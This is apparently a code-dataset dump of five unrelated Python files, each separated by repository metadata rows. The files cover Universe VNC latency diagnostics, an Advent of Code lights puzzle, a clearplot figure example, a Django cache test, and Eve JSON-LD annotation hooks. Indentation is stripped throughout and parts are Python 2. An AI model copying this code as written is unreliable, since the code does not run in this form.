|
1
|
24197
|
import collections
import fastzbarlight
import itertools
import logging
from multiprocessing import pool
import numpy as np
import time
import threading
# import psutil
import sys
from collections import namedtuple
from gym.utils import reraise
import re
from universe import error, pyprofile, spaces
# TODO: prefix the loggers
logger = logging.getLogger(__name__)
extra_logger = logging.getLogger('universe.extra.'+__name__)
def show(ob):
from PIL import Image
Image.fromarray(ob).show()
def standard_error(ary, axis, scale=1):
ary = np.array(ary) * scale
if len(ary) > 1:
return np.std(ary, axis=axis) / np.sqrt(len(ary) - 1)
else:
return np.std(ary, axis=axis)
def extract_timestamp(observation):
total = 0
for byte in observation[0]:
total = 256 * total + byte
for byte in observation[1]:
total = 256 * total + byte
timestamp = total/1000.
return timestamp
class MetadataDecoder(object):
@classmethod
def build(cls, metadata_encoding, pool, qr_pool, label):
metadata_encoding = metadata_encoding.copy()
type = metadata_encoding.pop('type')
if type == 'qrcode':
return QRCodeMetadataDecoder(label=label, pool=pool, qr_pool=qr_pool, **metadata_encoding)
elif type == 'pixels':
return PixelsMetadataDecoder(label=label)
else:
raise error.Error('Invalid encoding: {}'.format(type))
class AsyncDecode(object):
pool = None
def __init__(self, pool, qr_pool, method, x, y, width, height):
self.x = x
self.y = y
self.width = width
self.height = height
self._last_img = None
self.method = method
self.results = []
self.deque = collections.deque()
self.pool = pool
self.qr_pool = qr_pool
def __call__(self, img, available_at):
# Choose the return value
if len(self.deque) > 0 and self.deque[0].ready():
last = self.deque.popleft()
res = last.get()
if res is not None:
pyprofile.timing('vnc_env.diagnostics.async_decode.latency', time.time() - res['available_at'])
else:
res = False
pyprofile.gauge('vnc_env.diagnostics.async_decode.queue_depth', len(self.deque))
# Just grayscale it by keeping only one component. Should be
# good enough as this region is black and white anyway.
grayscale = img[self.y:self.y+self.height, self.x:self.x+self.width, 0]
# Apply processing if needed
match = np.array_equal(self._last_img, grayscale)
if not match:
pyprofile.incr('vnc_env.diagnostics.async_decode.schedule')
# sneakily copy if numpy hasn't, so it can be cached
self._last_img = np.ascontiguousarray(grayscale)
async = self.qr_pool.apply_async(self.method, (self._last_img, time.time(), available_at))
self.deque.append(async)
else:
pyprofile.incr('vnc_env.diagnostics.async_decode.cache_hit')
return res
class QRCodeMetadataDecoder(MetadataDecoder):
def __init__(self, pool, qr_pool, x, y, width, height, label):
self.flag_synchronous = False
self.x = x
self.y = y
self.width = width
self.height = height
self.label = label
self.decode = AsyncDecode(pool, qr_pool, self._decode, x, y, width, height)
def _decode(self, observation, start, available_at):
# This method gets wrapped by AsyncDecode.__call__
with pyprofile.push('vnc_env.diagnostics.QRCodeMetadataDecoder.qr_code_scanner'):
encoded = fastzbarlight.qr_code_scanner(observation.tobytes(), self.width, self.height)
if encoded is None:
# Failed to parse!
return
if encoded.startswith(b'v1:'):
encoded = encoded.decode('utf-8')
if len(encoded) != len('v1:') + 12 + 12:
raise error.Error('Bad length for metadata from enviroment: {}'.format(encoded))
encoded = encoded[len('v1:'):]
last_update = int(encoded[:12], 16) / 1000.0
last_action = int(encoded[12:24], 16) / 1000.
return {
# Timestamp on the image
'now': last_update,
# When the last probe was received
'probe_received_at': last_action,
'processing_start': start,
'processing_end': time.time(),
'available_at': available_at,
}
else:
raise error.Error('Bad version string for metadata from environment: {}'.format(encoded))
class PixelsMetadataDecoder(MetadataDecoder):
def __init__(self, label):
self.flag_synchronous = True
self.anchor = np.array([
[(0x12, 0x34, 0x56), (0x78, 0x90, 0xab)],
[(0x23, 0x45, 0x67), (0x89, 0x0a, 0xbc)],
], dtype=np.uint8)
self.location = None
self.last_search_metadata = 0
self.label = label
def _check_location(self, observation, location):
y, x = location
return np.all(observation[y:y+2, x:x+2] == self.anchor)
def _find_metadata_location(self, observation):
ys, xs = np.where(np.all(observation == self.anchor[0, 0], axis=-1))
if len(ys) == 0:
extra_logger.info('[%s] Could not find metadata anchor pixel', self.label)
return False
# TODO: handle multiple hits
assert len(ys) == 1
location = (ys[0], xs[0])
assert self._check_location(observation, location)
extra_logger.info('[%s] Found metadata anchor pixel: %s', self.label, location)
return location
def _should_search_metadata(self):
return time.time() - self.last_search_metadata > 1
def decode(self, observation, available_at=None):
start = time.time()
# metadata pixel location hasn't been initialized or it has moved
if not self.location or not self._check_location(observation,
self.location):
# only search for metadata occasionally
if self._should_search_metadata():
self.location = self._find_metadata_location(observation)
self.last_search_metadata = time.time()
if not self.location:
return False # False translates to None in DiagnosticsInstance
y, x = self.location
now = extract_timestamp(observation[y, x+2:x+4])
probe_received_at = extract_timestamp(observation[y, x+4:x+6])
return {
'now': now,
'probe_received_at': probe_received_at,
'processing_start': start,
'processing_end': time.time(),
'available_at': available_at,
}
class Diagnostics(object):
def __init__(self, n, probe_key, ignore_clock_skew=False, metadata_encoding=None, disable_action_probes=False):
# Each QR code takes about 1ms (and updates at 5fps). We do
# our best to ensure the QR is processed in time for the next
# step call (n/16 would put us right at the threshold).
self.pool = pool.ThreadPool(max(int(n/4), 1))
self.qr_pool = pool.ThreadPool(max(int(n/8), 1))
self.lock = threading.RLock()
self.instance_n = [None] * n
self.ignore_clock_skew = ignore_clock_skew
self.disable_action_probes = disable_action_probes
self.metadata_encoding = metadata_encoding
self.update(probe_key=probe_key, metadata_encoding=metadata_encoding)
# only used in flashgames right now
def update(self, probe_key, metadata_encoding):
self.probe_key = probe_key
self.metadata_encoding = metadata_encoding
for instance in self.instance_n:
if instance is not None:
instance.update(probe_key=self.probe_key, metadata_encoding=self.metadata_encoding)
def connect(self, i, network=None, label=None):
# This should technically be synchronized
self.instance_n[i] = DiagnosticsInstance(i, network, self.probe_key, self.ignore_clock_skew, self.metadata_encoding, disable_action_probes=self.disable_action_probes, qr_pool=self.qr_pool, pool=self.pool, label=label)
def close(self, i=None):
if i is not None:
self.instance_n[i] = None
else:
self.pool.close()
self.qr_pool.close()
for i in range(len(self.instance_n)):
self.close(i)
self.instance_n = None
def add_probe(self, action_n, mask_n):
if self.disable_action_probes or self.instance_n is None:
return
for instance, action, mask in zip(self.instance_n, action_n, mask_n):
# Important that masking prevents us from adding probes. (This
# avoids us e.g. filling in backticks into text boxes as the
# environment boots.)
if mask and instance:
instance.add_probe(action)
def add_metadata(self, observation_n, info_n, available_at=None):
"""Mutates the info_n dictionary."""
if self.instance_n is None:
return
with pyprofile.push('vnc_env.diagnostics.Diagnostics.add_metadata'):
async = self.pool.imap_unordered(
self._add_metadata_i,
zip(self.instance_n, observation_n, info_n, [available_at] * len(observation_n)))
list(async)
def _add_metadata_i(self, args):
instance, observation, info, now = args
if instance is None or observation is None:
return
instance.add_metadata(observation, info, now)
def extract_metadata(self, observation_n):
return [instance._extract_metadata(observation)
for instance, observation in zip(self.instance_n, observation_n)]
def clear_probes_when_done(self, done_n):
if self.instance_n is None: # if we've been closed there's nothing to do
return
for instance, done in zip(self.instance_n, done_n):
if done:
instance.clear_probe()
class DiagnosticsInstance(object):
anchor = np.array([
[(0x12, 0x12, 0x12), (0x78, 0x78, 0x78)],
[(0x23, 0x23, 0x23), (0x89, 0x89, 0x89)],
], dtype=np.uint8)
zero_clock_skew = np.zeros([2])
def __init__(self, i, network, probe_key, ignore_clock_skew, metadata_encoding, disable_action_probes, pool, qr_pool, label=None):
'''
network - either Network() object used to get clock skew, or None.
If None, we skip measuring clock skew, and skip measuring
diagnostics which rely on clock skew.
'''
if network is None:
assert ignore_clock_skew
self.ignore_clock_skew = ignore_clock_skew
self.label = label
self.i = i
self.network = network
self.probe_sent_at = None # local time
self.probe_received_at = None # remote time
self.action_latency_skewed = None
self.last_observation_timestamp = None
self.disable_action_probes = disable_action_probes
self.pool = pool
self.qr_pool = qr_pool
self.could_read_metadata = None
self.update(probe_key=probe_key, metadata_encoding=metadata_encoding)
def update(self, probe_key, metadata_encoding):
self.probe = [
spaces.KeyEvent(probe_key, down=True).compile(),
spaces.KeyEvent(probe_key, down=False).compile(),
]
if metadata_encoding is not None:
self.metadata_decoder = MetadataDecoder.build(metadata_encoding, pool=self.pool, qr_pool=self.qr_pool, label=self.label)
else:
self.metadata_decoder = None
def clear_probe(self):
self.probe_sent_at = None
self.probe_received_at = None
def add_probe(self, action):
if self.network is not None and not self.network.active():
return
if self.probe_sent_at is not None and self.probe_sent_at + 10 < time.time():
extra_logger.warn('[%s] Probe to determine action latency timed out (was sent %s). (This is harmless, but worth knowing about.)', self.label, self.probe_sent_at)
self.probe_sent_at = None
if self.probe_sent_at is None:
extra_logger.debug('[%s] Sending out new action probe: %s', self.label, self.probe)
self.probe_sent_at = time.time()
action += self.probe
assert self.probe_sent_at is not None
def add_metadata(self, observation, info, available_at=None):
"""Extract metadata from a pixel observation and add it to the info
"""
observation = observation['vision']
if observation is None: return
if self.network is not None and not self.network.active():
return
elif self.metadata_decoder is None:
return
elif observation is None:
return
# should return a dict with now/probe_received_at keys
with pyprofile.push('vnc_env.diagnostics.DiagnosticsInstance.add_metadata.decode'):
metadata = self.metadata_decoder.decode(observation, available_at=available_at)
if metadata is False:
# No metadata ready, though it doesn't mean parsing failed
metadata = None
elif metadata is None:
if self.could_read_metadata:
self.could_read_metadata = False
extra_logger.info('[%s] Stopped being able to read metadata (expected when environment resets)', self.label)
elif not self.could_read_metadata:
self.could_read_metadata = True
extra_logger.info('[%s] Started being able to read metadata', self.label)
if self.metadata_decoder.flag_synchronous and metadata is not None:
info['diagnostics.image_remote_time'] = metadata['now']
local_now = time.time()
if self.network is None:
# Assume the clock skew is zero. Should only be run on the
# same machine as the VNC server, such as the universe
# instance inside of the environmenth containers.
real_clock_skew = self.zero_clock_skew
else:
# Note: this is a 2-length vector of (min, max), so anything added to
# it is also going to be a 2-length vector.
# Most of the diagnostics below are, but you have to look carefully.
real_clock_skew = self.network.reversed_clock_skew()
# Store real clock skew here
info['stats.gauges.diagnostics.clock_skew'] = real_clock_skew
if self.ignore_clock_skew:
clock_skew = self.zero_clock_skew
else:
clock_skew = real_clock_skew
if metadata is not None:
# We'll generally update the observation timestamp infrequently
if self.last_observation_timestamp == metadata['now']:
delta = None
else:
# We just got a new timestamp in the observation!
self.last_observation_timestamp = metadata['now']
observation_now = metadata['now']
delta = observation_now - metadata['available_at']
# Subtract *local* time it was received from the *remote* time
# displayed. Negate and reverse order to fix time ordering.
info['stats.gauges.diagnostics.lag.observation'] = -(delta + clock_skew)[[1, 0]]
# if self.network is None:
# # The rest of diagnostics need the network, so we're done here
# return
probe_received_at = metadata['probe_received_at']
if probe_received_at == 0 or self.disable_action_probes:
# Happens when the env first starts
self.probe_received_at = None
elif self.probe_received_at is None: # this also would work for the equality case
self.probe_received_at = probe_received_at
elif self.probe_received_at != probe_received_at and self.probe_sent_at is None:
logger.info('[%s] Probe is marked as received at %s, but probe_sent_at is None. This is surprising. (HINT: do you have multiple universe instances talking to the same environment?)', self.label, probe_received_at)
elif self.probe_received_at != probe_received_at:
extra_logger.debug('[%s] Next probe received: old=%s new=%s', self.label, self.probe_received_at, probe_received_at)
self.probe_received_at = probe_received_at
# Subtract the *local* time we sent it from the *remote* time it was received
self.action_latency_skewed = probe_received_at - self.probe_sent_at
self.probe_sent_at = None
if self.action_latency_skewed:
action_lag = self.action_latency_skewed + clock_skew
self.action_latency_skewed = None
else:
action_lag = None
info['stats.gauges.diagnostics.lag.action'] = action_lag
local_now = time.time()
# Look at when the remote believed it parsed the score (not
# all envs send this currently).
#
# Also, if we received no new rewards, then this values is
# None. This could indicate a high reward latency (bad,
# uncommon), or that the agent is calling step faster than new
# rewards are coming in (good, common).
remote_score_now = info.get('rewarder.lag.observation.timestamp')
if remote_score_now is not None:
delta = remote_score_now - local_now
info['stats.gauges.diagnostics.lag.reward'] = -(delta + clock_skew)[[1, 0]]
# Look at when the remote send the message, so we know how
# long it's taking for messages to get to us.
rewarder_message_now = info.get('reward_buffer.remote_time')
if rewarder_message_now:
delta = rewarder_message_now - local_now
info['stats.gauges.diagnostics.lag.rewarder_message'] = -(delta + clock_skew)[[1, 0]]
def extract_n_m(dict_n_m, key):
output = []
for dict_n in dict_n_m:
layer = []
for dict in dict_n:
layer.append(dict[key])
output.append(layer)
return np.array(output)
# class ChromeProcessInfo(object):
# proc_regex = re.compile('.*(chrome|Chrome|nacl_helper).*')
# def add_system_stats(self, info, now):
# """TODO: This needs be moved to universe-envs and run there. Otherwise it only works if the env and agent
# are on the same machine. In addition a new rpc call, rpc.env.diagnostics, should be added to return
# data to the agent periodically.
# """
# start = time.time()
# # CPU
# cpu_percent = psutil.cpu_percent()
# info['diagnostics.env.cpu.percent'] = cpu_percent
# cpu_cores_percent = psutil.cpu_percent(percpu=True)
# num_cores = len(cpu_cores_percent)
# info['diagnostics.env.cpu.percent.all_cores'] = cpu_percent / num_cores
# info['diagnostics.env.cpu.percent.each_core'] = cpu_cores_percent
# info['diagnostics.env.cpu.num_cores'] = num_cores
# # MEMORY
# mem = psutil.virtual_memory()
# info['diagnostics.env.memory.percent'] = mem.percent
# info['diagnostics.env.memory.total'] = mem.total
# info['diagnostics.env.memory.available'] = mem.available
# # NETWORK
# if self.last_measured_at is not None:
# elapsed_ms = (now - self.last_measured_at) * 1000.
# current = psutil.net_io_counters()
# dl = (current.bytes_recv - self.system_network_counters.bytes_recv) / elapsed_ms
# ul = (current.bytes_sent - self.system_network_counters.bytes_sent) / elapsed_ms
# info['diagnostics.env.network.download_bytes_ps'] = dl * 1000.
# info['diagnostics.env.network.upload_bytes_ps'] = ul * 1000.
# self.system_network_counters = current
# # CHROME
# if self.chrome_last_measured_at is None or (time.time() - self.chrome_last_measured_at) > 30:
# # Fetch every 30 seconds
# self.chrome_last_measured_at = time.time()
# logger.info("Measuring Chrome process statistics")
# chrome_info = ChromeProcessInfo()
# chrome_info = best_effort(chrome_info.fetch, num_cores)
# if chrome_info is not None:
# self.chrome_info = chrome_info
# if self.chrome_info is not None:
# self._populate_chrome_info(self.chrome_info, info)
# # TODO: Add GPU stats
# pyprofile.push('diagnostics.system_stats')
# def _populate_chrome_info(self, chrome_info, info):
# pyprofile.push('diagnostics.chrome_process_info.process_iter')
# pyprofile.push('diagnostics.chrome_process_info.total')
# info['diagnostics.chrome.age'] = chrome_info.age
# info['diagnostics.chrome.cpu.time'] = chrome_info.cpu_time
# info['diagnostics.chrome.cpu.percent'] = chrome_info.cpu_percent
# info['diagnostics.chrome.cpu.percent.all_cores'] = chrome_info.cpu_percent_all_cores
# info['diagnostics.chrome.cpu.percent.all_cores_all_time'] = chrome_info.cpu_percent_all_cores_all_time
# info['diagnostics.chrome.num_processes'] = len(chrome_info.processes)
# def __init__(self):
# self.cpu_time = 0.
# self.cpu_percent = 0.
# self.min_create_time = None
# self.visited_pids = set()
# self.processes = []
# self.time_to_get_procs = None
# self.total_time_to_measure = None
# self.age = None
# self.cpu_percent_all_cores_all_time = None
# self.cpu_percent_all_cores = None
# def fetch(self, num_cores):
# start = time.time()
# start_process_iter = time.time()
# procs = list(psutil.process_iter())
# self.time_to_get_procs = time.time() - start_process_iter
# for proc in procs:
# try:
# name = proc.name()
# if self.proc_regex.match(name):
# self._fetch_single(proc, name)
# # N.B. Don't read children. defunct processes make this take 4ever.
# # Child processes are all uncovered by initial scan.
# except (psutil.AccessDenied, psutil.NoSuchProcess) as e:
# pass
# self.total_time_to_measure = time.time() - start
# if self.min_create_time is None:
# self.age = 0
# else:
# self.age = time.time() - self.min_create_time
# self.cpu_percent_all_cores_all_time = 100. * self.cpu_time / (self.age * num_cores)
# self.cpu_percent_all_cores = self.cpu_percent / num_cores
# return self
# def _fetch_single(self, proc, name):
# if proc.pid in self.visited_pids:
# return
# try:
# cpu_times = proc.cpu_times()
# cpu_percent = proc.cpu_percent()
# created = proc.create_time()
# if self.min_create_time is None:
# self.min_create_time = created
# else:
# self.min_create_time = min(created, self.min_create_time)
# cpu_time = cpu_times.user + cpu_times.system
# proc_info = namedtuple('proc_info', 'name cpu_time cpu_percent created age')
# proc_info.name = name
# proc_info.cpu_time = cpu_time
# proc_info.cpu_percent = cpu_percent
# proc_info.created = created
# proc_info.age = time.time() - created
# proc_info.pid = proc.pid
# self.processes.append(proc_info)
# # Totals
# self.cpu_time += cpu_time
# self.cpu_percent += cpu_percent
# self.visited_pids.add(proc.pid)
# except (psutil.AccessDenied, psutil.NoSuchProcess) as e:
# pass
|
mit
| 3,990,940,570,749,999,000
| 40.081494
| 229
| 0.598008
| false
| 3.795013
| false
| false
| false
|
ujjwalgulecha/AdventOfCode
|
2015/Day_18/Part_1.py
|
1
|
1072
|
from copy import copy, deepcopy
lights = []
with open("Day_18.input") as f:
for line in f:
data = line.strip()
light_temp = list(data)
lights.append(light_temp)
def getNeighbours(j, k, lights):
dx = [0, 1, -1]
dy = [0, 1, -1]
neighbours = 0
for x in dx:
for y in dy:
if j+x >= 0 and j+x < len(lights[0]) and k+y >= 0 and k+y < len(lights):
if lights[j+x][k+y] == on and (x or y):
neighbours+=1
return neighbours
def number_of_lights_on():
return sum(1 for i in xrange(len(lights[0])) for j in xrange(len(lights)) if lights[i][j] == on)
iterations = 100
on = '#'
off = '.'
for i in xrange(iterations):
temp_lights = deepcopy(lights)
for j in xrange(len(lights[0])):
for k in xrange(len(lights)):
neighbours = getNeighbours(j, k, lights)
if lights[j][k] == off:
if neighbours == 3:
temp_lights[j][k] = on
else:
temp_lights[j][k] = off
else:
if neighbours == 2 or neighbours == 3:
temp_lights[j][k] = on
else:
temp_lights[j][k] = off
lights = deepcopy(temp_lights)
print number_of_lights_on()
|
mit
| -6,348,467,895,201,080,000
| 22.844444
| 97
| 0.608209
| false
| 2.504673
| false
| false
| false
|
breedlun/clearplot
|
doc/source/examples/curve_and_image_sequence/curve_and_image_sequence.py
|
1
|
1576
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 18 15:43:55 2015
@author: Ben
"""
import clearplot.plot_functions as pf
import matplotlib.pyplot
import os
import numpy as np
#Load global response
data_dir = os.path.join(os.path.dirname(pf.__file__), os.pardir, 'doc', \
'source', 'data')
path = os.path.join(data_dir, 's140302C-mechanical_response.csv')
data = np.loadtxt(path, delimiter = ',')
#Specify the indices of the field images to be plotted
ndx_list = [0, 85, 141, 196, 252]
#Specify the column indices to crop the images to
cols = range(470,470+340)
#Load the field images into an image sequence list
im_seq = []
for ndx in ndx_list:
#Load field image
im_filename = 's140302C-eqps_field-frame_%r.png' %(ndx)
im_path = os.path.join(data_dir, 'hi-rez_field_images', im_filename)
im = matplotlib.pyplot.imread(im_path)
#Crop the field image and add to list
im_seq.append(im[:,cols,:])
#Create labels
labels = []
for i in range(1, len(ndx_list) + 1):
labels.append(str(i))
#Plot curve
[fig, ax, curves] = pf.plot('', data[:,0], data[:,1], \
x_label = ['\varepsilon', '\%'], y_label = ['\sigma', 'GPa'])
ax.label_curve(curves[0], labels, ndx = ndx_list, angles = 60)
ax.plot_markers(data[ndx_list,0], data[ndx_list,1], colors = [0,0,0])
fig.save('curve_and_image_sequence-a.png');
#Plot image sequence
[fig, ax, im_obj] = pf.show_im('curve_and_image_sequence-b.png', \
im_seq, scale_im = 0.3, c_label = ['\bar{\varepsilon}^p', '\%'], \
c_lim = [0, 100], c_tick = 25, b_labels = True, im_interp = 'bicubic', \
c_bar = True);
|
mit
| -1,595,391,377,537,425,700
| 34.044444
| 76
| 0.647843
| false
| 2.703259
| false
| false
| false
|
uw-it-aca/spotseeker_server
|
spotseeker_server/test/spot_caching.py
|
1
|
1190
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TestCase
from django.core.cache import cache
from spotseeker_server.models import Spot
class SpotCacheTest(TestCase):
def test_spot_caching(self):
spot = Spot.objects.create(name='foo')
spot_id = spot.pk
# Assert that a cache entry is created when we call
# json_data_structure()
js = spot.json_data_structure()
cached_js = cache.get(spot.json_cache_key())
self.assertEqual(js, cached_js)
# Assert that saving the spot removes the cache entry
spot.save()
self.assertNotIn(spot_id, cache)
# Assert that the spot now has a new etag
new_js = spot.json_data_structure()
self.assertNotEqual(js['etag'], new_js['etag'])
self.assertEqual(new_js['etag'], spot.etag)
# Assert the new cache entry reflects the updated etag
new_cached_js = cache.get(spot.json_cache_key())
self.assertEqual(new_js, new_cached_js)
# Assert that deleting the spot removes the cache entry
spot.delete()
self.assertNotIn(spot_id, cache)
|
apache-2.0
| -5,387,262,768,862,895,000
| 31.162162
| 63
| 0.652941
| false
| 3.801917
| false
| false
| false
|
restful-open-annotation/eve-restoa
|
oaeve.py
|
1
|
13383
|
#!/usr/bin/env python
"""Open Annotation JSON-LD support functions for Eve."""
__author__ = 'Sampo Pyysalo'
__license__ = 'MIT'
import json
import urlparse
import hashlib
import re
import flask
import mimeparse
import oajson
import seqid
from settings import TARGET_RESOURCE
# whether to expand @id values to absolute URLs
ABSOLUTE_ID_URLS = True
# mapping from Eve JSON keys to JSON-LD ones
jsonld_key_rewrites = [
('_id', '@id'),
]
eve_to_jsonld_key_map = dict(jsonld_key_rewrites)
jsonld_to_eve_key_map = dict([(b,a) for a,b in jsonld_key_rewrites])
def dump_json(document, prettyprint=True):
if not prettyprint:
return json.dumps(document)
else:
return json.dumps(document, indent=2, sort_keys=True,
separators=(',', ': '))+'\n'
def setup_callbacks(app):
# annotations
app.on_pre_POST_annotations += convert_incoming_jsonld
app.on_pre_PUT_annotations += convert_incoming_jsonld
app.on_post_GET_annotations += convert_outgoing_jsonld
app.on_post_PUT_annotations += convert_outgoing_jsonld
app.on_post_POST_annotations += convert_outgoing_jsonld
# annotations by document (separate Eve endpoint)
app.on_post_GET_annbydoc += convert_outgoing_jsonld
app.on_post_GET_annbydoc += rewrite_annbydoc_ids
# documents
app.on_post_GET_documents += rewrite_outgoing_document
# TODO: this doesn't seem to be firing, preventing the use of ETag
# in HEAD response to avoid roundtrips.
app.on_post_HEAD_documents += rewrite_outgoing_document
def eve_to_jsonld(document):
document = oajson.remap_keys(document, eve_to_jsonld_key_map)
if ABSOLUTE_ID_URLS:
ids_to_absolute_urls(document)
oajson.add_context(document)
oajson.add_types(document)
remove_meta(document)
remove_status(document)
remove_target_resources(document)
rewrite_links(document)
return document
def eve_from_jsonld(document):
document = oajson.remap_keys(document, jsonld_to_eve_key_map)
# TODO: invert ids_to_absolute_urls() here
oajson.normalize(document)
oajson.remove_context(document)
oajson.remove_types(document)
add_target_resources(document)
return document
def add_target_resources(document):
"""Add fragmentless target URL values to make search easier."""
if oajson.is_collection(document):
for item in document.get(oajson.ITEMS, []):
add_target_resources(item)
else:
target = document.get('target')
if target is None:
return
assert TARGET_RESOURCE not in document
# TODO: support multiple and structured targets
if not isinstance(target, basestring):
raise NotImplementedError('multiple/structured targets')
document[TARGET_RESOURCE] = urlparse.urldefrag(target)[0]
def remove_target_resources(document):
"""Remove fragmentless target URL values added to make search easier."""
if oajson.is_collection(document):
for item in document.get(oajson.ITEMS, []):
remove_target_resources(item)
else:
try:
del document[TARGET_RESOURCE]
except KeyError:
pass
def is_jsonld_response(response):
"""Return True if the given Response object should be treated as
JSON-LD, False otherwise."""
# TODO: reconsider "application/json" here
return response.mimetype in ['application/json', 'application/ld+json']
def convert_outgoing_jsonld(request, payload):
"""Event hook to run after executing a GET method.
Converts Eve payloads that should be interpreted as JSON-LD into
the Open Annotation JSON-LD representation.
"""
if not is_jsonld_response(payload):
return
doc = json.loads(payload.get_data())
jsonld_doc = eve_to_jsonld(doc)
payload.set_data(dump_json(jsonld_doc))
def _collection_ids_to_absolute_urls(document):
"""Rewrite @id values from relative to absolute URL form for collection."""
base = flask.request.base_url
# Eve responds to both "collection" and "collection/" variants
# of the same endpoint, but the join only works for the latter.
# We have to make sure the separator is present in the base.
if base and base[-1] != '/':
base = base + '/'
for item in document.get(oajson.ITEMS, []):
_item_ids_to_absolute_urls(item)
def _item_ids_to_absolute_urls(document, base=None):
"""Rewrite @id values from relative to absolute URL form for item."""
if base is None:
base = flask.request.base_url
try:
id_ = document['@id']
document['@id'] = urlparse.urljoin(base, id_)
except KeyError, e:
print 'Warning: no @id: %s' % str(document)
def ids_to_absolute_urls(document):
"""Rewrite @id value from relative to absolute URL form."""
if oajson.is_collection(document):
return _collection_ids_to_absolute_urls(document)
else:
return _item_ids_to_absolute_urls(document)
def remove_meta(document):
"""Remove Eve pagination meta-information ("_meta") if present."""
try:
del document['_meta']
except KeyError:
pass
def remove_status(document):
"""Remove Eve status information ("_status") if present."""
try:
del document['_status']
except KeyError:
pass
def _rewrite_collection_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD for a collection.
Also rewrites links for items in the collection."""
links = document.get('_links')
assert links is not None, 'internal error'
# Eve generates RFC 5988 link relations ("next", "prev", etc.)
# for collections when appropriate. Move these to the collection
# level.
for key in ['start', 'last', 'next', 'prev', 'previous']:
if key not in links:
pass
elif 'href' not in links[key]:
print 'Warning: no href in Eve _links[%s]' % key
else:
assert key not in document, \
'Error: redundant %s links: %s' % (key, str(document))
# fill in relative links (e.g. "people?page=2")
url = links[key]['href']
url = urlparse.urljoin(flask.request.url_root, url)
# TODO: don't assume the RESTful OA keys match Eve ones. In
# particular, consider normalizing 'prev' vs. 'previous'.
document[key] = url
# Others assumed to be redundant with JSON-LD information and safe
# to delete.
del document['_links']
# Process _links in collection items. (At the moment, just
# delete them.)
for item in document.get(oajson.ITEMS, []):
try:
del item['_links']
except KeyError:
pass
return document
def _rewrite_item_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD for non-collection."""
links = document.get('_links')
assert links is not None, 'internal error'
# Eve is expected to provide "collection" as a refererence back to
# the collection of which the item is a member. We'll move this to
# the item level with the collection link relation (RFC 6573)
if 'collection' not in links or 'href' not in links['collection']:
print 'Warning: no collection in Eve _links.' # TODO use logging
else:
assert oajson.COLLECTION_KEY not in document, \
'Error: redundant collection links: %s' % str(document)
document[oajson.COLLECTION_KEY] = links['collection']['href']
# Eve also generates a "self" links, which is redundant with
# JSON-LD "@id", and "parent", which is not defined in the RESTful
# OA spec. These can simply be removed.
del document['_links']
return document
def rewrite_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD."""
# HATEOAS is expected but not required, so _links may be absent.
if not '_links' in document:
print "Warning: no _links in Eve document." # TODO use logging
return document
if oajson.is_collection(document):
return _rewrite_collection_links(document)
else:
return _rewrite_item_links(document)
def is_jsonld_request(request):
"""Return True if the given Request object should be treated as
JSON-LD, False otherwise."""
content_type = request.headers['Content-Type'].split(';')[0]
# TODO: reconsider "application/json" here
return content_type in ['application/json', 'application/ld+json']
def rewrite_content_type(request):
"""Rewrite JSON-LD content type to assure compatibility with Eve."""
if request.headers['Content-Type'].split(';')[0] != 'application/ld+json':
return # OK
# Eve doesn't currently support application/ld+json, so we'll
# pretend it's just json by changing the content-type header.
# werkzeug EnvironHeaders objects are immutable and disallow
# copy(), so hack around that. (This is probably a bad idea.)
headers = { key: value for key, value in request.headers }
parts = headers['Content-Type'].split(';')
if parts[0] == 'application/ld+json':
parts[0] = 'application/json'
headers['Content-Type'] = ';'.join(parts)
request.headers = headers
def _is_create_annotation_request(document, request):
# TODO: better logic for deciding if a document is an annotation.
return (request.method == 'POST' and
(request.url.endswith('/annotations') or
request.url.endswith('/annotations/')))
def add_new_annotation_id(document, request):
"""Add IDs for annotation documents when necessary."""
if _is_create_annotation_request(document, request):
# Creating new annotation; fill ID if one is not provided.
if '_id' not in document:
document['_id'] = str(seqid.next_id())
return document
def convert_incoming_jsonld(request, lookup=None):
# force=True because older versions of flask don't recognize the
# content type application/ld+json as JSON.
doc = request.get_json(force=True)
assert doc is not None, 'get_json() failed for %s' % request.mimetype
# NOTE: it's important that the following are in-place
# modifications of the JSON dict, as assigning to request.data
# doesn't alter the JSON (it's cached) and there is no set_json().
doc = eve_from_jsonld(doc)
# If the request is a post and no ID is provided, make one
doc = add_new_annotation_id(doc, request)
# Also, we'll need to avoid application/ld+json.
rewrite_content_type(request)
def accepts_mimetype(request, mimetype):
"""Return True if requests accepts mimetype, False otherwise."""
accepted = request.headers.get('Accept')
return mimeparse.best_match([mimetype], accepted) == mimetype
def is_document_collection_request(request):
parsed = urlparse.urlparse(request.url)
return parsed.path in ('/documents', '/documents/')
def text_etag(text):
return hashlib.sha1(text.encode('utf-8')).hexdigest()
def rewrite_outgoing_document_collection(request, payload):
collection = json.loads(payload.get_data())
for document in collection.get(oajson.ITEMS, []):
# Only include the bare minimum in collection-level requests
id_, modified = document['name'], document['serializedAt']
document.clear()
document['@id'], document['serializedAt'] = id_, modified
collection = eve_to_jsonld(collection)
payload.set_data(dump_json(collection))
def rewrite_outgoing_document(request, payload):
if not is_jsonld_response(payload):
pass # Can only rewrite JSON
elif is_document_collection_request(request):
rewrite_outgoing_document_collection(request, payload)
elif not accepts_mimetype(request, 'text/plain'):
pass # Just return whatever is prepared
else:
# Return the text of the document as text/plain
doc = json.loads(payload.get_data())
try:
text = doc['text']
except KeyError, e:
text = 'Error: failed to load text: %s' % dump_json(doc)
payload.set_data(text)
payload.headers['Content-Type'] = 'text/plain; charset=utf-8'
payload.headers['ETag'] = text_etag(text)
def _rewrite_annbydoc_collection_ids(collection):
for item in collection.get(oajson.ITEMS, []):
_rewrite_annbydoc_item_id(item)
def _rewrite_annbydoc_item_id(document):
id_ = document['@id']
parts = urlparse.urlparse(id_)
m = re.match(r'^.*(/annotations/[^\/]+)$', parts.path)
if not m:
# TODO
print 'failed to rewrite ann-by-doc id %s' % id_
return
new_path = m.group(1)
rewritten = urlparse.urlunparse((parts.scheme, parts.netloc, new_path,
parts.params, parts.query, parts.fragment))
document['@id'] = rewritten
def rewrite_annbydoc_ids(request, payload):
"""Event hook to run after GET on annotations-by-document endpoint.
Removes extra "/documents/.../" from @id values. For example, an
@id of "http://ex.org/documents/1.txt/annotations/1" would be
rewritten as "http://ex.org/annotations/1".
"""
